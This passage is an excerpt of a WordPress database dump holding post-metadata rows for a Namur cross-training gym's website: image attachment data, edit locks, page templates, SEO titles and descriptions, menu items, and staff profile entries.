(88, 70, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:14:\"2013/06/kb.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"kb-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(89, 72, '_wp_attached_file', '2013/06/vipr-f1.jpg'),
(90, 72, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:19:\"2013/06/vipr-f1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"vipr-f1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(91, 75, '_wp_attached_file', '2013/06/ript.jpg'),
(92, 75, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:16:\"2013/06/ript.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"ript-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(106, 102, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1116;s:6:\"height\";i:287;s:4:\"file\";s:17:\"2013/06/pico1.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"pico1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"pico1-300x77.png\";s:5:\"width\";i:300;s:6:\"height\";i:77;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"pico1-1024x263.png\";s:5:\"width\";i:1024;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:17:\"pico1-595x224.png\";s:5:\"width\";i:595;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(107, 103, '_wp_attached_file', '2013/06/picto2.png'),
(108, 103, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1045;s:6:\"height\";i:1077;s:4:\"file\";s:18:\"2013/06/picto2.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"picto2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"picto2-291x300.png\";s:5:\"width\";i:291;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"picto2-993x1024.png\";s:5:\"width\";i:993;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:18:\"picto2-595x224.png\";s:5:\"width\";i:595;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(105, 102, '_wp_attached_file', '2013/06/pico1.png'),
(109, 130, '_wp_attached_file', '2013/06/rg.jpg'),
(110, 130, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:132;s:6:\"height\";i:195;s:4:\"file\";s:14:\"2013/06/rg.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"rg-132x150.jpg\";s:5:\"width\";i:132;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(111, 148, '_edit_last', '1'),
(1845, 452, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383584282:1\";}\";'),
(1843, 452, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1844, 452, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1030, 331, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1031, 331, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374769981:1\";}\";'),
(1032, 331, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1033, 11, '_su_title', 'Cross Training Center - Les séances'),
(1054, 334, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1034, 11, '_su_description', 'Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training'),
(1035, 11, '_su_rich_snippet_type', 'none'),
(218, 148, 'nom', 'Pierrard'),
(219, 148, 'prenom', 'Julie'),
(220, 148, 'mail', 'julie@crosstrainingcenter.be'),
(221, 148, 'actif_trombi', 'oui'),
(222, 148, 'fonction', 'Gérante, Diététicienne et coach'),
(223, 148, 'telephone_fixe', ''),
(224, 148, 'telephone_portable', ''),
(225, 148, 'commentaires', 'Baccalauréat en diététique\r\nSpécialisation en diététique du sport\r\nEnseignante en éducation nutritionnelle\r\nPratiquante de judo, natation et cyclisme'),
(226, 148, 'actif_trombi_1', ''),
(141, 148, '_edit_lock', '1372860691:1'),
(142, 150, '_edit_last', '1'),
(1026, 22, '_su_rich_snippet_type', 'none'),
(1018, 328, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1019, 328, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373526228:1\";}\";'),
(1020, 328, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1021, 330, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1022, 330, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374769809:1\";}\";'),
(1023, 330, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1024, 22, '_su_title', 'Cross Training Center - Le cross training'),
(1025, 22, '_su_description', 'Unique à Namur, une nouvelle façon de faire du fitness. Le cross training regroupe les disciplines : TRX Suspension Training, Kettlebell, ViPR, RIP Trainer.'),
(1060, 335, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(191, 150, 'nom', 'Gille'),
(192, 150, 'prenom', 'Mathieu'),
(193, 150, 'mail', ''),
(194, 150, 'actif_trombi', 'oui'),
(195, 150, 'fonction', 'Coatch'),
(196, 150, 'telephone_fixe', ''),
(197, 150, 'telephone_portable', ''),
(198, 150, 'commentaires', 'Préparateur physique en sport collectif et individuel\r\nBrevet A de l’URBSFA\r\nPratiquant de foot, triathlon, tennis et golf'),
(199, 150, 'actif_trombi_1', ''),
(172, 150, '_edit_lock', '1372861677:1'),
(1693, 429, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1692, 429, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(230, 154, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(231, 154, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372866031:1\";}\";'),
(232, 154, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1691, 429, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383472654:1\";}\";'),
(1842, 452, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1690, 429, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1841, 452, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383584221:1\";}\";'),
(1840, 452, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1839, 452, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1837, 452, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383584160:1\";}\";'),
(1838, 452, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1836, 452, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1835, 452, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1834, 452, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1681, 428, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1680, 428, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(251, 155, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(252, 155, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372866736:1\";}\";'),
(253, 155, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(254, 156, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(255, 156, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372866772:1\";}\";'),
(256, 156, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(257, 157, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(258, 157, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372866815:1\";}\";'),
(259, 157, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(260, 158, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(261, 158, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372866881:1\";}\";'),
(262, 158, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1679, 428, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383472505:1\";}\";'),
(1678, 428, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(266, 159, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(267, 159, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372867702:1\";}\";'),
(268, 159, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(269, 160, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(270, 160, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372867707:1\";}\";'),
(271, 160, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1677, 427, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1676, 427, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(275, 161, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(276, 161, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372868240:1\";}\";'),
(277, 161, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1675, 427, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383472461:1\";}\";'),
(1674, 427, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1833, 452, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383584062:1\";}\";'),
(1832, 452, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1831, 451, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(287, 162, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(288, 162, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372868811:1\";}\";'),
(289, 162, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(290, 163, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(291, 163, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372868821:1\";}\";'),
(292, 163, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(293, 164, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(294, 164, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372868861:1\";}\";'),
(295, 164, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(296, 165, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(297, 165, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372868903:1\";}\";'),
(298, 165, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1664, 425, '_menu_item_url', ''),
(1663, 425, '_menu_item_xfn', ''),
(1662, 425, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(302, 166, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(303, 166, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869018:1\";}\";'),
(304, 166, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(305, 167, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(306, 167, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869154:1\";}\";'),
(307, 167, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(308, 168, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(309, 168, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869159:1\";}\";'),
(310, 168, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(311, 169, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(312, 169, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869186:1\";}\";'),
(313, 169, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(314, 170, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(315, 170, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869226:1\";}\";'),
(316, 170, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(317, 171, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(318, 171, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869284:1\";}\";'),
(319, 171, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(320, 172, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(321, 172, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869702:1\";}\";'),
(322, 172, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1661, 425, '_menu_item_target', ''),
(1660, 425, '_menu_item_object', 'page'),
(1659, 425, '_menu_item_object_id', '421'),
(326, 173, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(327, 173, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372869819:1\";}\";'),
(328, 173, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(329, 174, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(330, 174, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870126:1\";}\";'),
(331, 174, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(332, 175, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(333, 175, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870146:1\";}\";'),
(334, 175, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1658, 425, '_menu_item_menu_item_parent', '0'),
(1657, 425, '_menu_item_type', 'post_type'),
(338, 176, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(339, 176, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870404:1\";}\";'),
(340, 176, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1656, 424, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1655, 424, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1654, 424, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383472129:1\";}\";'),
(1830, 451, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1653, 424, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(347, 177, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(348, 177, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870855:1\";}\";'),
(349, 177, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(350, 178, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(351, 178, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870868:1\";}\";'),
(352, 178, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(353, 179, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(354, 179, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870920:1\";}\";'),
(355, 179, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(356, 180, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(357, 180, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372870942:1\";}\";'),
(358, 180, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1829, 451, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(362, 181, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(363, 181, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372871113:1\";}\";'),
(364, 181, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(365, 182, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(366, 182, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372871840:1\";}\";'),
(367, 182, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1828, 451, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1648, 142, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(371, 183, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(372, 183, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372872257:1\";}\";'),
(373, 183, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1647, 142, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(377, 184, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(378, 184, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372872467:1\";}\";'),
(379, 184, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1646, 142, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1645, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1644, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383471820:1\";}\";'),
(383, 185, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(384, 185, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372872582:1\";}\";'),
(385, 185, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1643, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1642, 142, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(389, 186, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(390, 186, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372872809:1\";}\";'),
(391, 186, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1641, 142, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(395, 187, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(396, 187, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372872880:1\";}\";'),
(397, 187, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1640, 142, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1639, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1638, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383471552:1\";}\";'),
(1637, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1636, 421, '_su_rich_snippet_type', 'none'),
(404, 188, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(405, 188, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873027:1\";}\";'),
(406, 188, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(407, 189, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(408, 189, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873080:1\";}\";'),
(409, 189, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(410, 190, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(411, 190, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873122:1\";}\";'),
(412, 190, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(413, 191, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(414, 191, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873176:1\";}\";'),
(415, 191, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(416, 192, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(417, 192, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873192:1\";}\";'),
(418, 192, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(419, 193, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(420, 193, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873207:1\";}\";'),
(421, 193, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(422, 194, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(423, 194, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873226:1\";}\";'),
(424, 194, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(425, 195, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(426, 195, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873245:1\";}\";'),
(427, 195, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(428, 196, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(429, 196, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873258:1\";}\";'),
(430, 196, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(431, 197, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(432, 197, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873275:1\";}\";'),
(433, 197, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1635, 422, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1634, 422, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383471340:1\";}\";'),
(1633, 422, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1632, 421, '_wp_page_template', 'default'),
(1631, 421, '_edit_lock', '1383586291:1'),
(1630, 421, '_edit_last', '1'),
(440, 198, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(441, 198, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873711:1\";}\";'),
(442, 198, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1629, 419, '_su_rich_snippet_type', 'none'),
(1628, 420, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1627, 420, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383471313:1\";}\";'),
(446, 199, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(447, 199, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873831:1\";}\";'),
(448, 199, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(449, 200, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(450, 200, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873878:1\";}\";'),
(451, 200, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1626, 420, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1625, 419, '_wp_page_template', 'default'),
(1624, 419, '_edit_lock', '1383471207:1'),
(455, 201, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(456, 201, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372873974:1\";}\";'),
(457, 201, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(458, 202, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(459, 202, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372874020:1\";}\";'),
(460, 202, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(461, 203, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(462, 203, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372874222:1\";}\";'),
(463, 203, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(464, 204, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(465, 204, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372874231:1\";}\";'),
(466, 204, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1623, 419, '_edit_last', '1'),
(1622, 418, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1621, 418, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(1620, 418, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1619, 418, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(476, 205, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(477, 205, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372874467:1\";}\";'),
